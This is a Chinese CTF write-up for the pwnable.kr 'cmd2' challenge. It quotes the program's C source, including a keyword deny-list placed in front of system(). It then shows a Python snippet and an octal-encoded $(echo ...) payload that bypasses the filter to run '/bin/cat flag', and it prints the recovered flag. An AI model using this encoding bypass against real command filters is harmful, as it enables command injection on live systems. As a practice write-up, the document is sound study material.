pwnable.kr-cmd2

题目描述:

Daddy bought me a system command shell.

but he put some filters to prevent me from playing with it without his permission…

but I wanna play anytime I want!

ssh [email protected] -p2222 (pw:flag of cmd1)

这题ssh的登陆密码是cmd1的flag,登陆后查看cmd2.c的源代码:

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
 int r=0;
 r += strstr(cmd, "=")!=0;
 r += strstr(cmd, "PATH")!=0;
 r += strstr(cmd, "export")!=0;
 r += strstr(cmd, "/")!=0;
 r += strstr(cmd, "`")!=0;
 r += strstr(cmd, "flag")!=0;
 return r;
}

extern char** environ;
void delete_env(){
 char** p;
 for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
 delete_env();
 putenv("PATH=/no_command_execution_until_you_become_a_hacker");
 if(filter(argv[1])) return 0;
 printf("%s\n", argv[1]);
 system( argv[1] );
 return 0;
}

我们看到相比cmd1还多过滤了“/”,所以这里我们需要绕过这个限制,这里有多种方法可以绕过,经过测试我们发现通过cmd2中的system可以直接执行echo,但是其他的命令都需要绝对路径才行,也就是例如whoami需要”/bin/whoami”,这样会出现”/“。这里利用echo进行绕过:

把所有的字符经过8进制编码:

from pwn import *
cmd = "/bin/cat flag"
print "\\"+"\\".join([oct(i) for i in ordlist(cmd)])

然后得到编码后的字符串,最后构造payload:

[email protected]:~$ ./cmd2 ‘$(echo “\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147”)’

$(echo “\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147”)

FuN_w1th_5h3ll_v4riabl3s_haha

可以成功得到flag:

FuN_w1th_5h3ll_v4riabl3s_haha

最近的文章

pwnable.kr-uaf

题目描述: Mommy, what is Use After Free bug? ssh [email protected] -p2222 (pw:guest)根据题目描述我们知道该题考察UAF(use after free)漏洞,关于UAF,简单说下就是内存地址在free后并没有被销毁,下次为相同的结构类型分配大小类似的空间时,之前的内存空间会被重新使用,如果第二次的指针能够被用户所控制,就造成了UAF漏洞。然后有些基础知识(转自:http://blog.csdn.net/qq_20307...…

c++ cpp free payload pwn pwnable.kr uaf use after free vtable 溢出 虚函数继续阅读
更早的文章

pwnable.kr-cmd1

题目描述: Mommy! what is PATH environment in Linux? ssh [email protected] -p2222 (pw:guest)cmd1.c的源码为:#include <stdio.h>#include <string.h>int filter(char* cmd){ int r=0; r += strstr(cmd, "flag")!=0; r += strstr(cmd, "sh")!=0; r += strstr(...…

cmd pwnable.kr shell拼接继续阅读